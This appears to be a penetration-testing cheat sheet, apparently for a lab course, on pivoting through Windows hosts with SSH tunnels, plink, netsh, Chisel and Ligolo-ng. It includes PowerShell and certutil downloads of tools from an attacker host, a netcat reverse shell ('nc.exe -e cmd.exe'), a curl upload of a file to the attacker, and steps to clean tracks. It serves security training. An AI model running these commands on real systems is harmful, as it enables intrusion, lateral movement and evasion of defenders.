Windows

IMPORTANT NOTE

NOTE: REMEBER TO CHANGE THE PORT NUMBER IN /ETC/PROXYCHAINS TO KALI PORT YOU HAVE SET UP. (SAFEST IS TO KEEP ALL THE PORT THE SAME TO AVOID CONFUSION)

SSH.exe

SSH Local Tunneling

On CONFLUENCE01

ssh -N -L 0.0.0.0:<CONFLUENCE01 Port>:<HRSHARES01 IP Address>:<HRSHARES Port> <PGDATABASE01 Username>@<PGDATABASE01 IP Address>

On KALI

Any commands running on Kali to be pointed at CONFLUENCE01 IP Address

SSH Dynamic Tunneling

On CONFLUENCE01

ssh -N -D 0.0.0.0:<CONFLUENCE01 Port> <PGDATABASE01 Username>@<PGDATABASE01 IP Address>

On Kali

Any commands running on Kali to be pointed at HRSHARES01 IP Address via Proxychains

SSH Remote Port Forwarding

On CONFLUENCE01

ssh -N -R 127.0.0.1:<Kali Port>:<PGDATABASE01 IP Address>:<PGDATABASE01 Port> kali@<Kali IP Address>

On Kali

Any commands running on Kali to be pointed at Loopback address

NOTE: Make sure machine is running OpenSSH

SSH Remote Dynamic Port Forwarding

On CONFLUENCE01

ssh -N -R <Kali Port> kali@<Kali IP Address>

On Kali

Any commands running on Kali can be pointed at any IP via Proxychains

NOTE: Make sure can RCE to machine

On Machine

  1. Get Netcat from Kali

powershell wget -Uri http://<Kali IP Address>/nc.exe -Outfile C:\Windows\Temp\nc.exe
  1. Set up listener on Kali

  2. Send reverse shell to Kali via RCE

C:\Windows\Temp\nc.exe -e cmd.exe <Kali IP Address> <Kali Port>
  1. Get plink.exe

powershell wget -Uri http://<Kali IP Address>/plink.exe -Outfile C:\Windows\Temp\plink.exe
  1. Execute port forwarding

C:\Windows\Temp\plink.exe -ssh -l -pw kali -R 127.0.0.1:<Kali Port>:127.0.0.1:3389 <Kali IP Address>

The port forwarding above allow us to RDP into the machine

On Kali

Any commands running on Kali to be pointed Loopback

Netsh

NOTE: Make sure to RDP into a user that has Administrative rights

1

Create Netsh port forwarding

netsh interface portproxy add v4tov4 listenport=2222 listenaddress=<MULTISERVER03 IP Address> connectport=22 connectaddress=<PGDATABASE01 IP Address>
2

Create firewall rule

netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=<MULTISERVER03 IP Address> localport=2222 action=allow
3

The above command allow us to SSH into PGDATABASE01 using PGDATABASE01 Username and MULTISERVER03 IP Address

Clean tracks after done

netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=<MULTISERVER03 IP Address>

Chisel

On Kali

To start server

chisel server --port 8080 --reverse

To monitor network streams

sudo tcpdump -nvvvXi tun0 tcp port 8080

Any commands running on Kali to be pointed at PGDATABASE01 IP Address via Proxychains

On CONFLUENCE01

To install chisel on target machine

iwr -Uri http://<Kali IP Address>:<Kali Port>/chisel.exe -Outfile C:\Windows\Temp\chisel.exe

To port forward

chisel.exe client <Kali IP Address>:<Kali Port> R:socks

To view the error output

chisel.exe client <Kali IP Address>:<Kali Port> R:socks > C:\Windows\Temp\output.txt 2>&1
curl.exe --data-binary @C:\Windows\Temp\output.txt http://<Kali IP Address>:<Kali Port>/

Ligolo-Ng

NOTE: When using nmap, add --unprivileged OR -PE to avoid false positives

Setup

On Kali

1
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
sudo ip route add <Internal net>/24 dev ligolo
2
mkdir ligolo && cd ligolo
3
mkdir proxy && cd proxy
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
tar -xf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
cd ..
4
mkdir ../agents && cd ../agents
mkdir windows && cd windows
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_windows_amd64.zip
unzip ligolo-ng_agent_0.7.5_windows_amd64.zip && rm ligolo-ng_agent_0.7.5_windows_amd64.zip
cd ..
5
mkdir linux && cd linux
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
tar -xf ligolo-ng_agent_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
cd ..
6
python3 -m http.server 80

On Target Machine

certutil -urlcache -split -f http://<Kali IP Address>/<windows / linux>/agent.exe

Tunnel

On Kali

./proxy -selfcert

NOTE: Run the above command in /ligolo/proxy

On Target Machine

agent.exe -connect <Kali IP Address>:<Kali Listening port> -ignore-cert

NOTE: Once agent connects to server, return to Kali Machine and follow the steps in ligolo-ng console

session
<SELECT WHICH SESSION>
start

NOTE: Add the following if you want the internal to reach you. E.G. reverse shell

listener_add --addr 0.0.0.0:<Kali Port> --to 127.0.0.1:<Kali Port>

Verify

listener_list

Last updated